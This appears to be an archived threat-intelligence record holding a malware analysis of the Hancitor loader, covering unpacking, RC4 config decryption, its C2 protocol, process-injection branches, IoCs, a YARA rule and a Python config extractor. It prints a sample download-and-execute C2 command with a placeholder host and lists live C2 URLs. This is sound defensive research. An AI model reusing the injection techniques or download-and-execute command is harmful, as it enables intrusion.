{
	"id": "73dd1ef4-63c4-4ea9-8978-4c51f05e62c3",
	"created_at": "2026-04-06T01:31:14.940896Z",
	"updated_at": "2026-04-10T03:24:24.466263Z",
	"deleted_at": null,
	"sha1_hash": "516ff5061fa2068af170a2abd3ef06a373583d0f",
	"title": "Hancitor Loader",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 751091,
	"plain_text": "Hancitor Loader\r\nBy Nidal Fikri\r\nPublished: 2021-09-09 · Archived: 2026-04-06 00:43:10 UTC\r\nHancitor in a Nutshell\r\nHancitor is a well-known malware loader that has been in use for years, since it was first observed in 2015. A malware loader is the software that drops the actual malicious content on the system and then executes the first stage of the attack. Hancitor has been the attacker's loader of choice for delivering malware such as FickerStealer, Sendsafe, and Cobalt Strike when the victim's characteristics are met. In recent months, more threat intelligence has been gathered confirming that Cuba Ransomware gangs have selected Hancitor as well [1]. The popularity of Hancitor among threat actors is expected to last for a while. Therefore, it is crucial to ensure your organization's safety from this emerging threat.\r\nHancitor Infection Vector\r\nFigure (1): How Hancitor can sneak into your environment to download additional malware.\r\nThe Hancitor DLL is embedded within malicious documents delivered by phishing e-mails. The method the malicious document uses to achieve execution is usually a VBA macro that runs when the document is opened. Once dropped by the document, the initial packed DLL is an intermediate stage responsible for unpacking and exposing Hancitor's true functionality. Based on the information collected about the victim host, it decides which malware to deploy. Hancitor then performs its loading functionality in order to infect the system with the actual malicious content.\r\nhttps://cyber-anubis.github.io/malware%20analysis/hancitor/\r\nPage 1 of 13\r\nTechnical Summary\r\n1. Configuration Extraction: Hancitor ships with an embedded RC4-encrypted configuration and a hard-coded key. It uses the Microsoft Windows CryptoAPI to perform the decryption. This configuration contains the C2 servers it will contact for further commands.\r\n2. Host Profiling: Hancitor gathers information about the host in order to decide which malicious payload to download and to generate a unique victim ID. For instance, if the host is joined to an Active Directory domain, the conditions for Cobalt Strike are met. The collected information includes: OS version, IP address, domain trusts, computer name \u0026 username.\r\n3. C2 Communication: The victim profile is forwarded to the C2, which decides the next orders. The returned C2 command is base64 encoded with an additional layer of single-byte XOR encryption. The command selects one of 5 available loading techniques and supplies a URL from which the additional malware is downloaded, loaded and executed.\r\n4. Payload Download: There are many options to choose from. For example, Hancitor can download fully fledged malicious EXE or DLL files, or even tightly crafted shellcode. This high degree of flexibility serves many threat actors and makes Hancitor an attractive choice.\r\n5. Malicious Code Execution: Whether by process injection or simply by dropping to disk and executing, Hancitor is capable of performing the operations needed to run the malicious code on the victim's machine.\r\nTechnical Analysis\r\nFirst Look \u0026 Unpacking\r\nFigure (2): Results as of 2021-08-26 14:38:31 UTC. Different results may appear.\r\nCatching the DLL initially dropped by the malicious document and inspecting it, it was first seen on 2021-08-26 14:38:31 UTC according to VirusTotal. At that date, the sample was flagged as malicious by only 6 security vendors.\r\nFigure (3): Before \u0026 after view of the memory dump.\r\nTo unpack the dropped DLL, we use x64dbg to set a breakpoint on the VirtualAlloc API. After new data is written into the allocated memory region, we set a hardware breakpoint on execution there. We continue single-stepping through the rest of the unpacking stub to make sure the import table is built. Then we can spot a successfully unpacked PE header as well as many resolved strings in the newly allocated memory region. Finally, we dump the memory section to disk.\r\nHost Profiling\r\nFigure (4): All functions were labeled after RE.\r\nUsing IDA Pro we can see that the unpacked Hancitor DLL has two exports which lead to the same function. From there our static code analysis begins. The malware's functionality starts with host profiling. The collected information includes: OS version, victim's IP address, domain names \u0026 DNS names, computer name, username, and whether the machine is x64 or x86.\r\nFigure (5): The malware uses GetAdaptersAddresses to obtain the required info.\r\nIt creates a unique ID for the victim from the MAC addresses of all connected adapters XORed with the volume serial number of the Windows directory.\r\nFigure (6): The check_if_x64 routine is used to determine whether the victim machine is x64.\r\nThen it concatenates the final string that holds the collected host information to be sent to the C\u0026C server. The call to the mw_wrap_config_decryption routine is discussed in detail below. It is used to extract the embedded configuration, which is also included in the final host profile. Something very useful when writing YARA rules is the format string {\"GUID=%I64u\u0026BUILD=%s\u0026INFO=%s\u0026EXT=%s\u0026IP=%s\u0026TYPE=1\u0026WIN=%d.%d\"}, which makes a good indicator for Hancitor. These collected characteristics of the infected host decide which malware will be deployed. For instance, if the host is joined to an Active Directory domain, the Cobalt Strike malware will be downloaded and executed.\r\nFigure (7): Hexadecimal representation of the data residing in the .data section.\r\nBut before finishing the host profile, the malware decrypts the embedded configuration in order to send a copy to the C\u0026C server. The decryption routine references two global data variables very close to the beginning of the .data section. From the way the parameters are arranged for the decryption routine, I've concluded that the 8 bytes beginning at 0x5A5010 are the decryption key, followed by the encrypted configuration.\r\nFigure (8): You can use the MSDN documentation for more information about the APIs.\r\nHancitor comes with an embedded RC4-encrypted configuration and a hard-coded key. It uses the Microsoft Windows CryptoAPI to do the decryption. First, the key is SHA-1 hashed before attempting the decryption. Then only the first 5 bytes of the hashed key are used to decrypt the encrypted data.\r\nThe upper 16 bits of the 4th parameter denote the size of the RC4 decryption key. Here it is 0x280011 = 0000000000101000 -- 0000000000010001, in which the upper half 101000 = 40 bits or 5 bytes.\r\nFigure (9): Screenshot of the actual decrypted configuration the malware uses.\r\nWe can use CyberChef to simulate the decryption process statically. First, the 8-byte key {f0da08fe225d0a8f} is SHA-1 hashed = {67f6c6259f8f4ef06797bbd25edc128fd64e6ad7}. Then the first 5 bytes of the hash are used as the final RC4 key to decrypt the configuration data. This configuration contains the C2 servers the malware will contact for further commands based on the collected host profile. Here at the bottom right corner, we can see that the malware comes with 3 C\u0026C servers to try to connect to. At the end of this report, we will use another way to automatically extract the embedded configuration using Python.\r\nC\u0026C Communication\r\nFigure (10): The malware checks for a 200 OK response before retrieving the C2 commands.\r\nHancitor extracts the C2 URLs and initializes the connection with the remote end using the high-level Wininet.dll library APIs. It uses the following hard-coded User-Agent {\"Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko\"}, which is very common.\r\nFirst, the collected host profile is sent in an HTTP POST request. Second, it accepts the C2 command matched to the gathered information about the victim. The received C2 command is base64 encoded and XOR encrypted with the single-byte key 0x7A. The malware performs the necessary decoding before interpreting the command.\r\nThe command consists of 4 parts:\r\n1. A character from the set {'b','e','l','n','r'} specifying the action to be performed.\r\n2. The colon character : as delimiter.\r\n3. The URL of the malicious content to be downloaded.\r\n4. The bar character | as delimiter.\r\n# i.e. decoded command\r\nX:http://badsite.com/malware.exe|\r\nExecuting C2 Commands\r\nFigure (11): Conditional code flows depending on the 1st character of the C2 command.\r\nAfter retrieving the C2 command and performing the appropriate decoding, the command is validated and then passed to the routine that downloads and executes the malicious content. The malicious content is downloaded from the URL at offset 3 from the beginning of the C2 string. Then, based on the first character of the C2 command, one of the switch-case branches is executed.\r\nThere are 5 available options or execution paths. Excluding the n command, which simply acts as a NOP operation, we have 4 valid options.\r\nThe 'b' Command\r\nThis execution branch performs process injection into a newly created svchost.exe process started with the CREATE_SUSPENDED flag. The injected malicious code is first checked to be a valid PE file (DLL or EXE) before being injected. For the new suspended svchost.exe process, the injection is done in the classic way using the APIs VirtualAllocEx and WriteProcessMemory. What is more interesting here is the way the malware sets the new entry point for the malicious code.\r\nFigure (12): A thread context is a snapshot of processor-specific register data.\r\nIt changes the value of the EAX register and sets the new thread context, overwriting the old one. The EAX register in a newly created thread always points to the OEP. This effectively transfers the entry point of the newly created svchost.exe process to the start of the injected malicious binary.\r\nThe 'e' Command\r\nFigure (13): The lpStartAddress parameter is a wrapper function which calls the OEP of the binary.\r\nThe difference between this execution branch and the previous one is that this one executes the malicious binary inside the currently running process without touching svchost.exe. First, Hancitor parses the PE header to find the ImageBase and AddressOfEntryPoint fields.\r\nThen it builds the import table that the injected binary will use, using LoadLibraryA and GetProcAddress to do the job, because the newly created thread would crash if it had unresolved dependencies. At last, based on the function flags, the malware decides whether to launch the newly downloaded malicious binary in a new separate thread or simply call it as a function.\r\nThe 'l' Command\r\nFigure (14): The function flags are arg_inject_svchost and arg_create_new_thread, which decide the injection.\r\nHere the malware doesn't check for a valid PE file because it is supposed to inject shellcode. Based on the function's flags, Hancitor decides whether to inject into a newly created svchost.exe or to call the malicious shellcode as a function in the currently running process.\r\nThe malware doesn't need to resume the suspended process because only its main thread is suspended. The malware creates another thread within svchost.exe to execute the malicious shellcode.\r\nThe 'r' Command\r\nFigure (15): The %TEMP% directory is used to store ephemeral temporary files.\r\nThis execution path is the only one that actually drops files on disk. Hancitor drops the newly downloaded malicious binary in the %TEMP% directory with a random name beginning with the \"BN\" prefix. Then, if it is an EXE file, it simply executes it in a new process. If it is a DLL file, it uses rundll32.exe to execute the malicious DLL.\r\nConclusion\r\nHancitor is considered a straightforward loader, but a very efficient one at the same time. So far, Hancitor has targeted companies of all sizes in a wide variety of industries and countries to deploy very serious malware like FickerStealer, Sendsafe, and Cobalt Strike, or even Cuba Ransomware. It is a must to take the appropriate countermeasures to defend your organization from such a dreadful threat. We can't be sure which threat actors will also use Hancitor as their loader in the future. Yet one thing is sure: as effective as it has been to date, the threat posed by Hancitor will not fade away in the near future.\r\nIoCs\r\nNo. | Description | Hash / URL\r\n1 | The initial dropped DLL | EFBDD00DF327459C9DB2FFC79B2408F7F3C60E8BA5F8C5FFD0DEBAFF986863A8\r\n2 | The unpacked DLL | 5E74015E439AE6AA7E0A29F26EF2389663EB769D25ABCEB636D8272A74F27B7F\r\n4 | Hancitor C\u0026C Server 1 | http://intakinger.com/8/forum.php\r\n5 | Hancitor C\u0026C Server 2 | http://idgentexpliet.ru/8/forum.php\r\n6 | Hancitor C\u0026C Server 3 | http://declassivan.ru/8/forum.php\r\nYARA Rule\r\nrule hancitor : loader\r\n{\r\n    meta:\r\n        description = \"This is a noob rule for detecting unpacked Hancitor DLL\"\r\n        author = \"Nidal Fikri @cyber_anubis\"\r\n    strings:\r\n        $mz = {4D 5A} // PE file\r\n        $s1 = \"http://api.ipify.org\" ascii fullword\r\n        $s2 = /GUID=%I64u\u0026BUILD=%s\u0026INFO=%s(\u0026EXT=%s)?\u0026IP=%s\u0026TYPE=1\u0026WIN=%d\\.%d\\(x64\\)/ ascii fullword\r\n        $s3 = /GUID=%I64u\u0026BUILD=%s\u0026INFO=%s(\u0026EXT=%s)?\u0026IP=%s\u0026TYPE=1\u0026WIN=%d\\.%d\\(x32\\)/ ascii fullword\r\n        $s4 = \"Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko\" ascii fullword\r\n    condition:\r\n        (filesize \u003c 500KB) and ($mz at 0) and (3 of ($s*))\r\n}\r\nThis Python script automatically extracts the configuration of the Hancitor malware. The steps are as follows:\r\nOpen the binary file.\r\nGet the .data section.\r\nExtract the key and the encrypted configuration data at offset 16.\r\nSHA-1 hash the extracted key to get the final key.\r\nUse the key to decrypt the configuration.\r\nimport pefile    # To manipulate PE files\r\nimport hashlib   # To perform the SHA-1 hashing\r\nimport binascii  # To perform unhexing\r\nimport arc4      # To perform the RC4 decryption\r\n\r\n# This function creates a PE object, then iterates over the sections to locate\r\n# the .data section and returns its content.\r\ndef get_data_section(file):\r\n    pe_file = pefile.PE(file)\r\n    for section in pe_file.sections:\r\n        if b\".data\" in section.Name:\r\n            return section.get_data()\r\n    raise ValueError(\"No .data section found in \" + file)\r\n\r\n# RC4-decrypts the configuration blob and prints the first 200 bytes of plaintext\r\ndef rc4_decryption(key, encrypted_data):\r\n    cipher = arc4.ARC4(key)\r\n    decrypted_content = cipher.decrypt(encrypted_data)\r\n    extracted_config = decrypted_content[:200]\r\n    print(extracted_config.decode('utf-8', errors='replace'))  # Prints the decoded text\r\n\r\ndef main():\r\n    file_path = input(\"Pls enter the file path: \")\r\n    data_section = get_data_section(file_path)\r\n    # The config data begins at offset 16 inside the .data section\r\n    full_configuration = data_section[16:]\r\n    # The key is the first 8 bytes while the encrypted data is the rest\r\n    key = full_configuration[0:8]\r\n    data = full_configuration[8:]\r\n    # The RC4 key is only the first 5 bytes = 10 hex digits of the SHA-1 digest\r\n    hashed_key = hashlib.sha1(key).hexdigest()\r\n    rc4_key = hashed_key[0:10]\r\n    rc4_decryption(binascii.unhexlify(rc4_key), data)\r\n\r\nif __name__ == '__main__':\r\n    main()\r\nReferences\r\nhttps://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon\r\nhttps://elis531989.medium.com/dissecting-and-automating-hancitors-config-extraction-1a6ed85d99b8\r\nSource: https://cyber-anubis.github.io/malware%20analysis/hancitor/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://cyber-anubis.github.io/malware%20analysis/hancitor/"
	],
	"report_names": [
		"hancitor"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775439074,
	"ts_updated_at": 1775791464,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/516ff5061fa2068af170a2abd3ef06a373583d0f.pdf",
		"text": "https://archive.orkl.eu/516ff5061fa2068af170a2abd3ef06a373583d0f.txt",
		"img": "https://archive.orkl.eu/516ff5061fa2068af170a2abd3ef06a373583d0f.jpg"
	}
}